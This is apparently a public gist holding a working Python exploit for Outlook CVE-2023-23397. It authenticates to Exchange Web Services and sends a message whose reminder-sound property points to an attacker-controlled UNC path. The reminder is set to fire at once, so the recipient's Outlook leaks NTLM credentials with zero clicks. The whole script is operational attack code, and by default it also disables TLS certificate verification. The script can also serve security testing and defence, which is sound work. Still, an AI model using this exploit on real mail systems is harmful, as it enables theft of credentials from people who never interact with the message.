@tothi
Created March 28, 2023 09:30
Exploiting Outlook CVE-2023-23397 using Python by sending the message through EWS. The script authenticates to EWS with a valid mailbox login (exchangelib), builds a message whose reminder sound path (PidLidReminderFileParameter) points at an attacker-supplied path, and sends it so the recipient's Outlook tries to open that path when the reminder fires. Caveats: the PoC disables TLS certificate verification for the EWS session, takes the password on the command line, and leaves a copy of the message in the sending mailbox's Sent Items. Use only against systems you are authorized to test.
#!/usr/bin/python -u
from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty
from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
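import argparse
import getpass

import urllib3

parser = argparse.ArgumentParser(description='Outlook CVE-2023-23397: 0-click PrivEsc')
parser.add_argument('-u', '--username', required=True,
                    help='mailbox login; this value is also used as the primary SMTP address')
# No longer required: when omitted the password is read interactively so it
# does not land in shell history or in `ps` output.  Passing -p still works.
parser.add_argument('-p', '--password',
                    help='password (prompted for if omitted)')
parser.add_argument('-s', '--server', required=True,
                    help='EWS host name, e.g. mail.example.com')
parser.add_argument('-t', '--target', required=True,
                    help='recipient address that receives the crafted message')
parser.add_argument('-f', '--filepath', required=True,
                    help=r'value for PidLidReminderFileParameter, normally a UNC path to your listener (\\host\share\x.wav)')
parser.add_argument('--verify-tls', action='store_true',
                    help='keep TLS certificate verification on (default: off, as in the original PoC)')
args = parser.parse_args()

if args.password is None:
    args.password = getpass.getpass(f"Password for {args.username}: ")

if not args.verify_tls:
    # SECURITY: this disables certificate verification for every EWS request,
    # so the credentials above can be captured by anyone who can interpose on
    # the path to the server.  Kept as the default only because the original
    # PoC behaved this way; pass --verify-tls whenever the server presents a
    # trusted certificate.
    BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)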
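def log(msg: str) -> None:
    """Write *msg* to stdout exactly as given (no newline appended) and flush.

    Progress lines in this script are printed in two halves ("[+] Sending
    message..." now, "SENT!" later), so the first half must reach the
    terminal immediately.  The ``-u`` in the shebang only applies when the
    file is executed through it; ``flush=True`` gives the same behaviour
    under ``python3 script.py`` or when stdout is a pipe.
    """
    print(msg, end="", flush=True)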
# Bind to the mailbox the message is sent from.  Autodiscover is off, so
# args.server must be the EWS host itself.  The login name doubles as the
# primary SMTP address here -- NOTE(review): a DOMAIN\user style login would
# therefore need a separate address argument; confirm against your target.
log("[*] Logging in to EWS...")
credentials = Credentials(args.username, args.password)
config = Configuration(server=args.server, credentials=credentials)
account = Account(
    primary_smtp_address=args.username,
    config=config,
    autodiscover=False,
    access_type=DELEGATE,
)
log(f"{args.username}\n")
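# Property-set GUID shared by every PidLid* property below (PSETID_Common in
# MS-OXPROPS).  Defined once so a typo cannot silently break a single property.
PSETID_COMMON = '00062008-0000-0000-C000-000000000046'


class PidLidReminderTime(ExtendedProperty):
    """PidLidReminderTime (0x8502): time at which the reminder is due."""
    property_set_id = PSETID_COMMON
    property_id = 0x8502
    property_type = 'SystemTime'


class PidLidReminderSet(ExtendedProperty):
    """PidLidReminderSet (0x8503): whether a reminder is set on the item."""
    property_set_id = PSETID_COMMON
    property_id = 0x8503
    property_type = 'Boolean'


class PidLidReminderFileParameter(ExtendedProperty):
    """PidLidReminderFileParameter (0x851F): path of the reminder sound file.

    This is the field CVE-2023-23397 abuses: Outlook opens the path when the
    reminder fires, so a UNC path makes it authenticate to a remote host.
    Note the script registers this class under the attribute name
    'PidLidReminderFileParameters' (plural); keep the two in step.
    """
    property_set_id = PSETID_COMMON
    property_id = 0x851f
    property_type = 'String'


class PidLidReminderOverride(ExtendedProperty):
    """PidLidReminderOverride (0x851C): honour the custom sound settings."""
    property_set_id = PSETID_COMMON
    property_id = 0x851c
    property_type = 'Boolean'


class PidLidReminderPlaySound(ExtendedProperty):
    """PidLidReminderPlaySound (0x851E): play a sound when the reminder fires."""
    property_set_id = PSETID_COMMON
    property_id = 0x851e
    property_type = 'Boolean'


class PidLidFlagRequest(ExtendedProperty):
    """PidLidFlagRequest (0x8530): follow-up flag text."""
    property_set_id = PSETID_COMMON
    property_id = 0x8530
    property_type = 'String'


class PidTagFlagStatus(ExtendedProperty):
    """PidTagFlagStatus (0x1090): follow-up flag state (tagged property, no set GUID)."""
    property_tag = 0x1090
    property_type = 'Integer'


class PidTagFlagComplete(ExtendedProperty):
    """PidTagFlagComplete (0x1091): follow-up completion time (tagged property)."""
    property_tag = 0x1091
    property_type = 'SystemTime'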
log("[*] Building malicious email message...\n")
message = Message(
    account=account,
    folder=account.sent,            # send_and_save() later keeps a copy here
    subject="You Have Been Pwn3d!",
    body="Give me your hashes!",
    to_recipients=[args.target],
)

# Attribute name -> ExtendedProperty subclass.  The attribute names are what
# the values are assigned to further down; 'PidLidReminderFileParameters'
# (plural) is deliberately the name used throughout this script even though
# the class is named in the singular.
_EXTENDED_PROPERTIES = (
    ('PidTagFlagStatus', PidTagFlagStatus),
    ('PidTagFlagComplete', PidTagFlagComplete),
    ('PidLidFlagRequest', PidLidFlagRequest),
    ('PidLidReminderSet', PidLidReminderSet),
    ('PidLidReminderTime', PidLidReminderTime),
    ('PidLidReminderFileParameters', PidLidReminderFileParameter),
    ('PidLidReminderOverride', PidLidReminderOverride),
    ('PidLidReminderPlaySound', PidLidReminderPlaySound),
)
for attr_name, prop_cls in _EXTENDED_PROPERTIES:
    message.register(attr_name, prop_cls)
log("[*] Registered Extended Properites...\n")
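log("[*] Setting values...")
if not args.filepath.startswith('\\\\'):
    # The credential leak relies on Outlook reaching a remote share through a
    # UNC path when the reminder sound is opened; a local path produces no
    # outbound authentication.  Warn rather than refuse so unusual forms can
    # still be tested deliberately.
    log(f"\n[!] Warning: {args.filepath!r} does not look like a UNC path (\\\\host\\share\\file); "
        "no hash is expected to leak. ")

now = UTC_NOW()                              # one timestamp so the flag and reminder agree
message.PidTagFlagStatus = 2                 # item is flagged for follow-up
message.PidLidFlagRequest = 'Pwn!'
message.PidLidReminderSet = True             # a reminder exists on this item ...
message.PidLidReminderTime = now             # ... and is already due, so it fires as soon as it lands
message.PidTagFlagComplete = now
message.PidLidReminderFileParameters = args.filepath   # CVE-2023-23397 trigger: custom reminder sound path
message.PidLidReminderOverride = True        # use the custom sound settings ...
message.PidLidReminderPlaySound = True       # ... and actually play the sound
log("DONE.\n")

log("[+] Sending message...")
# Sends the item AND stores a copy in the sender's Sent Items folder
# (folder=account.sent above).  Remove it afterwards if that matters.
message.send_and_save()
log("SENT!\n")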